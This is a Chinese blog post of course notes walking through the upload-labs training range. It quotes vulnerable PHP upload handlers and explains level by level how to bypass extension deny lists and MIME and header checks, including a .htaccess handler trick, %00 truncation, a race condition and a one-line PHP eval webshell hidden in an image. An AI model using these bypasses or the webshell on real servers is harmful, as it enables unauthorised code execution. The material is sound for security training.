[小迪安全20-23天]upload-laps

最新推荐文章于 2024-03-11 00:15:07 发布
最新推荐文章于 2024-03-11 00:15:07 发布
阅读量330 收藏
点赞数
分类专栏: 小迪安全笔记 文章标签: 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_54252904/article/details/116896942
版权

upload-lab

1.前端验证

1.禁用本地js

  • 火狐禁用js

F12->设置->禁用javascript在这里插入图片描述
在这里插入图片描述

2. burpsuite抓包改包

3. 谷歌覆盖
拷贝页面源码
在这里插入图片描述
通过本地新建html文件把源码拷贝进去在这里插入图片描述
把js代码删除并修改或添加action
把action修改为页面上传文件的后端代码文件在这里插入图片描述
在这里插入图片描述
成功上传在这里插入图片描述
执行成功
在这里插入图片描述

2.Mime验证

在这里插入图片描述
在这里插入图片描述
通过修改content-Length中的值来进行上传

2.内容头验证

每中图片类型的头部信息是不同的如png为下方塒NG
在这里插入图片描述
Gif 为GIF89a
在这里插入图片描述
jpg为JFIF
在这里插入图片描述

3.文件名解析

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array('.asp','.aspx','.php','.jsp');
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //收尾去空

        if(!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;            
            if (move_uploaded_file($temp_file,$img_path)) {
                 $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '不允许上传.asp,.aspx,.php,.jsp后缀文件!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

通过修改文件名为php3 php5 phtml
在这里插入图片描述
成功

4.htaccess文件解析

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2","php1",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2","pHp1",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //收尾去空

        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

第四关主要考察的就是.htaccess文件解析
在这里插入图片描述

<FilesMatch "haha">

SetHandler application/x-httpd-php

</FilesMatch>

代码意思为把文件名中有haha关键字的文件当作php文件执行
在这里插入图片描述

5.大小写上传

在这里插入图片描述

6. 空格绕过

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = $_FILES['upload_file']['name'];
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.date("YmdHis").rand(1000,9999).$file_ext;
            if (move_uploaded_file($temp_file,$img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件不允许上传';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

相较于前面少了trim函数
空格绕过
在这里插入图片描述
在这里插入图片描述

7. “.”逗号绕过

$file_name = deldot($file_name);//删除文件名末尾的点
相较于上一关少了这个函数,可以在文件末尾添加.进行上传
在这里插入图片描述
在这里插入图片描述

8. ::$DATA绕过

$file_ext = str_ireplace(’::$DATA’, ‘’, $file_ext);//去除字符串::$DATA
这一个相较于上一关少了这个函数
必须是windows, 必须是php, 必须是那个源文件
php在window的时候如果文件名+"::$DATA"会把::$DATA之后的数据当成文件流处理,不会检测后缀名.且保持"::$DATA"之前的文件名
他的目的就是不检查后缀名…
在这里插入图片描述

9.逻辑绕过

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array(".php",".php5",".php4",".php3",".php2",".html",".htm",".phtml",".pht",".pHp",".pHp5",".pHp4",".pHp3",".pHp2",".Html",".Htm",".pHtml",".jsp",".jspa",".jspx",".jsw",".jsv",".jspf",".jtml",".jSp",".jSpx",".jSpa",".jSw",".jSv",".jSpf",".jHtml",".asp",".aspx",".asa",".asax",".ascx",".ashx",".asmx",".cer",".aSp",".aSpx",".aSa",".aSax",".aScx",".aShx",".aSmx",".cEr",".sWf",".swf",".htaccess");
        $file_name = trim($_FILES['upload_file']['name']);
        $file_name = deldot($file_name);//删除文件名末尾的点
        $file_ext = strrchr($file_name, '.');
        $file_ext = strtolower($file_ext); //转换为小写
        $file_ext = str_ireplace('::$DATA', '', $file_ext);//去除字符串::$DATA
        $file_ext = trim($file_ext); //首尾去空
        
        if (!in_array($file_ext, $deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH.'/'.$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $is_upload = true;
            } else {
                $msg = '上传出错!';
            }
        } else {
            $msg = '此文件类型不允许上传!';
        }
    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

通过文件末尾添加php. .
$file_name = deldot($file_name);//删除文件名末尾的点 成:.php.
$file_ext = trim($file_ext); //首尾去空: 把后面的空格过滤为 .php.
进而绕过

在这里插入图片描述

10.一次过滤

$file_name = str_ireplace($deny_ext,"", $file_name);
这只是过滤了一次
上传xx.pphphp
在这里插入图片描述
在这里插入图片描述

11. %00截断

主要是利用C语言的特性%00就是结束的标志所以后面的都不执行

在这里插入图片描述
在这里插入图片描述

12.post %00截断

post 提交%00要进行url编码
因为post不会自动解码
get会自动解码
在这里插入图片描述
%00编码为%2500使用get方式提交%2500解码为%00,但Post不会把%2500解码
所以就把%00的改为url解码这样本地进行url编码时结果就为%00
在这里插入图片描述

13-16. 文件包含

将图片与php代码合并生成图片木马<?php eval($_POST['x'])?>
在这里插入图片描述
在这里插入图片描述
调用后门代码x=phpinfo()

17.二次渲染

上传图像时要经过两次操作,用户可以对图像进行修改

$is_upload = false;
$msg = null;

if(isset($_POST['submit'])){
    $ext_arr = array('jpg','png','gif');
    $file_name = $_FILES['upload_file']['name'];
    $temp_file = $_FILES['upload_file']['tmp_name'];
    $file_ext = substr($file_name,strrpos($file_name,".")+1);
    $upload_file = UPLOAD_PATH . '/' . $file_name;

    if(move_uploaded_file($temp_file, $upload_file)){
        if(in_array($file_ext,$ext_arr)){
             $img_path = UPLOAD_PATH . '/'. rand(10, 99).date("YmdHis").".".$file_ext;
             rename($upload_file, $img_path);
             $is_upload = true;
        }else{
            $msg = "只允许上传.jpg|.png|.gif类型文件!";
            unlink($upload_file);
        }
    }else{
        $msg = '上传出错!';
    }
}

if(move_uploaded_file($temp_file, $upload_file))在没有判断文件后缀时就已经上传到服务器了, 因此可以利用刚在服务器的那段时间对文件进行操作即条件竞争使文件处于允许状态,这样就能使php文件留在服务器,使用工具burpsuite
当通过设定一个随意参数来进行发送数据包时不断访问上传的地址直到正确为止
在这里插入图片描述
在这里插入图片描述

19.文件目录命名

$is_upload = false;
$msg = null;
if (isset($_POST['submit'])) {
    if (file_exists(UPLOAD_PATH)) {
        $deny_ext = array("php","php5","php4","php3","php2","html","htm","phtml","pht","jsp","jspa","jspx","jsw","jsv","jspf","jtml","asp","aspx","asa","asax","ascx","ashx","asmx","cer","swf","htaccess");

        $file_name = $_POST['save_name'];
        $file_ext = pathinfo($file_name,PATHINFO_EXTENSION);

        if(!in_array($file_ext,$deny_ext)) {
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' .$file_name;
            if (move_uploaded_file($temp_file, $img_path)) { 
                $is_upload = true;
            }else{
                $msg = '上传出错!';
            }
        }else{
            $msg = '禁止保存为该类型文件!';
        }

    } else {
        $msg = UPLOAD_PATH . '文件夹不存在,请手工创建!';
    }
}

通过代码分析先是$file_name等于递交的文件名,然后使用pathinfo函数返回文件后缀给$file_ext并进行黑名单判断,如果不在就正常上传,在就报错
两种方法:00截断,和 文件目录命名
00截断在这里插入图片描述
因为是通过save_name进行传参所以修改save_name的值
文件目录命名
在这里插入图片描述
上传后缀名.php/.在这里插入图片描述
在这里插入图片描述

20.数组命名

20关为白名单策略

$is_upload = false;
$msg = null;
if(!empty($_FILES['upload_file'])){
    //检查MIME
    $allow_type = array('image/jpeg','image/png','image/gif');
    if(!in_array($_FILES['upload_file']['type'],$allow_type)){
        $msg = "禁止上传该类型文件!";
    }else{
        //检查文件名
        $file = empty($_POST['save_name']) ? $_FILES['upload_file']['name'] : $_POST['save_name'];
        if (!is_array($file)) {
            $file = explode('.', strtolower($file));
        }

        $ext = end($file);
        $allow_suffix = array('jpg','png','gif');
        if (!in_array($ext, $allow_suffix)) {
            $msg = "禁止上传该后缀文件!";
        }else{
            $file_name = reset($file) . '.' . $file[count($file) - 1];
            $temp_file = $_FILES['upload_file']['tmp_name'];
            $img_path = UPLOAD_PATH . '/' .$file_name;
            if (move_uploaded_file($temp_file, $img_path)) {
                $msg = "文件上传成功!";
                $is_upload = true;
            } else {
                $msg = "文件上传失败!";
            }
        }
    }
}else{
    $msg = "请选择要上传的文件!";
}

$file = empty($_POST[‘save_name’]) ? $_FILES[‘upload_file’][‘name’] : $_POST[‘save_name’];
这句代码意思为如果上传save_name为空则执行$_FILES[‘upload_file’][‘name’]
如果不空则执行$_POST[‘save_name’];
修改代码save_name[0] = 1.php/
save_name[1] = “”
save_name[2] = jpg
过滤时$ext = end($file) = jpg 绕过
reset($file) . ‘.’ . $file[count($file) - 1]; = 1.php/.jpg 绕过

道长在此
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
B站小安全笔记第二十天-文件上传之基础过滤方式
m0_61530426的博客
07-29 742
B站小安全笔记
安全学习笔记--第23天:web漏洞-文件上传之解析漏洞及编辑器安全
zr1213159840的博客
12-20 1883
各个平台漏洞解析讲解 iis papche nginx 各个web编辑器安全讲解 https://navisec.it/编辑器漏洞手册/ 目前比较多的编辑器是fck 各个cms文件上传简要讲解 wordpress phpcms 演示案例 几种中间件解析漏洞简要演示 参考共享的中间件漏洞PDF 工IS6/7简要说明-本地搭建 Apache配置安全-—vulhub Apache解析漏洞-低版本 解释 x.php.xxx.yy 识别最后的yyy 如果不识别 向前解析 直到识别 利用场景 如果对方中间ap
[小安全20-23天]文件上传
weixin_54252904的博客
05-16 652
nginx解析漏洞 在后面添加/1.php实现png解析php fincms上传漏洞 通过上传头像修改png格式为php 但返回上传错误但却是是上传上去了 通过查看网站标题得知网站时fincms搭建可以上网查看漏洞得知有上传漏洞 虽然提示上传失败但却是后台成功上传,查看漏洞直到上传文件路径为 /uploadfile/member/(用户uid)/0x0.php Weblogic任意文件上传 https://vulhub.org/#/environments/weblogic/CVE-2
(2020上半年第22天(其他漏洞--CSRF+SSRF))小网络安全笔记
u013630181的博客
12-04 419
参考①:cnblogs.com/dogecheng/p/11583412.thml
upload-labs学习笔记
qq_62540010的博客
03-06 202
upload-labs学习笔记 Upload-labs是一个所有类型的上传漏洞的靶场 less 2-mime认证 首先我们先介绍一下源码PHP函数 file_exists(路径) 判断指定的文件或目录是否存在,不存在返回true,否则返回false in_array(变量,数组) 如果变量存在于数组就返回true,否则返回false isset(变量) 如果变量存在且值不为null返回true,否则返回false move_uploaded_file(文件路径,文件夹路径) 将文件移动
LAPS-WebUI:一个用于LAPS的简单易用的Web界面(本地管理员密码解决方案)
05-14
LAPS-WebUI 一个用于LAPS的简单易用的Web界面(本地管理员密码解决方案) 设置前提 安装了Microsoft LAPS的有效Active Directory .NET Core 5.0兼容操作系统(Ubuntu / Debian / CentOS / Alpine Linux / Windows ...
Crackmapexec-LAPS:用于CrackMapExec的LAPS模块
05-23
Crackmapexec-LAPS 用于CrackMapExec的...p CLEAR-TEXT -M圈 技术模块Grazie:根据CME byt3bl33d3r @snowscan @HackAndDo 信用:@ n00py1信用参考: ://www.n00py.io/2020/12/dumping-laps-passwords-from-linux/ 信用
laps-web:一个网站,用于管理对由Microsoft LAPS管理的本地管理员密码的访问
04-28
Lithnet LAPS Web应用程序 Lithnet LAPS Web应用程序是一个IIS应用程序,允许您管理对由管理的 它提供对目录中存储的LAPS密码的细化权限,审核,电子邮件警报和限速访问,并且与OpenID Connect,WS-Federation(ADFS...
LAPS-for-macOS:用于检索 LAPS AD 密码的 macOS 应用程序
05-29
适用于 macOS 的 LAPS 用于检索 LAPS AD 密码的 macOS 应用程序 使用此应用程序,您可以输入可以读取 LAPS 密码并将其保存到钥匙串的 Active Directory 凭据。 只需输入计算机名称并通过单击获取密码来提取密码。 ...
SharpLAPS:从LDAP检索LAPS密码
03-04
夏普属性ms-mcs-AdmPwd存储明文LAPS密码。 可以使用execute-assembly在Cobalt Strike会话中execute-assembly此可执行文件。 它将从Active Directory中检索LAPS密码。 要求(两者皆有): 具有ExtendedRight或Generic...
安全学习笔记--第22天:web漏洞-文件上传值内容逻辑数组绕过
zr1213159840的博客
12-18 900
图片一句话制作方法 copy 1.png /b + shell.php /a webshell.jpg 文件头检测 图像文件信息判断 逻辑安全-二次渲染 在我们上传文件后,网站会对图片进行二次处理(格式、尺寸要求等),服务器会把里面的内容进行替换更新,处理完成后,根据我们原有的图片生成一个新的图片并放到网站对应的标签进行显示。 参考资料:https://blog.csdn.net/weixin_45588247/article/details/119177948 逻辑安全-条件竞争 条件竞争漏洞就是代码在执
upload-labs通关总结 | 那些年踩过的坑
m0_56691564的博客
10-31 1345
本文就是简单总结一下upload-lab通关方法和踩过的坑,参考的通关教程放在文末,需要的小伙伴去看~
学习笔记- 第02天:基础入门-数据包拓展
weixin_48800344的博客
09-01 1070
网站解析对应** http/s数据包(没经过代理服务器的) 客户端(游览器)->服务器(web server) request 请求 客户端(游览器)<-服务器(web server) response 响应 #request 请求数据包 #response 返回数据包 经过代理服务器 客户端->代理服务器(proxy server)->服务端 客户端<-代理服务器(proxy server)<-服务端 #proxy server 代理服务器 因为
安全笔记01
weixin_45382875的博客
06-24 607
安全01 2021/6/22 域名 域名注册商:阿里云、万网、 一级域名:baidu.com 二级域名:news.baidu.com 三/多级域名:shehui.news.baidu.com 域名与安全测试:如果一级域名不能突破,可以从其它级域名下手 DNS与Host DNS 域名系统(服务)协议   是一种分布式网络目录服务,主要用域名与IP地址的相互转换,以及控制因特网的电子邮件的发送。   域名系统。用来把机器名字转换成IP地址。简单来说,全球有很多域名服务器,用来存储从域名到IP地址的映射。
【小安全day03】vm16\win2003 iis\kali linux\vulhub安装和配置+基础知识
RichUee的博客
11-24 630
安全第3天知识复盘
[小安全25-26天]xss
weixin_54252904的博客
05-21 394
订单cookie窃取和shell箱子反杀简单测试窃取cookie本地构造实现xss攻击1方法2webshell沙箱反杀反杀操作演示存在后门的大马beef结合xss攻击获取session思路 通过提交订单的方式植入xss来获取网站管理员cookie 简单测试 窃取cookie https://www.postman.com/downloads/下载postman 本地构造实现xss攻击1 本地服务器端39.96.44.170 文件jieshou.php <scri
upload-labs详细教程
热门推荐
shayebudon的博客
11-09 1万+
第一关 js检查 查看源码 由源代码可知,允许上传的文件为.jpg|.png|.gif 我们上传一个.jpg文件 利用burp suite进行抓包 将jpg改为php后,放包 上传成功。 第二关Content-Type 查看源码 有源码可知,发现只判断Content-Type类型,所以我们只需修改Content-Type进行绕过即可 首先上传php文件,抓上传包 将箭头所指的内容改为image/jpeg或image/png或image/gif后...
[BT]小安全2023学习笔记(第22天:Web攻防-Python特性)
最新发布
Bluetuan的博客
03-11 423
pyc文件是Python编译器创建的已编译的Python代码文件。当你运行Python程序时,Python解释器将.py文件(即源代码)编译成中间形式,这就是.pyc文件。这个过程称为“字节编译”,生成的.pyc文件包含的是字节码,这种字节码不能直接被计算机的处理器执行,而需要Python虚拟机来解释执行。如果攻击者获得了pyc文件,那么就可以反编译这个pyc文件获得源py程序代码,相当于可以直接看到源代码,但是一般很难获得pyc文件,只有在CTF比赛中出题者会给出。
【小安全】Day11信息打点-工具篇
2201_75772809的博客
05-07 1001
资产信息保存路径:/root/ShuiZe_0x727/result/de0b9305e7b5/46bca337.xlsx。打开浏火狐览器,访问https://172.17.0.1:5003/,使用默认用户名密码admin/arlpass登录。在config/config.py中进行修改,调用api查询功能需要从配置文件修改为自已对应的 api信息。pip默认源是国外的网址,下载速度非常慢,将pip的源替换为国内的站点可以解决该问题。生成文件在/OneForAll/results里,用vim编辑器查看。
如何使用laps 读取密码
05-30
如果您有足够的权限,可以通过以下步骤使用 LAPS 读取密码: 1. 打开 Active Directory 用户和计算机管理控制台(ADUC)。...另外,LAPS 可能不适用于所有组织,因此请先了解您的组织是否使用了 LAPS。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值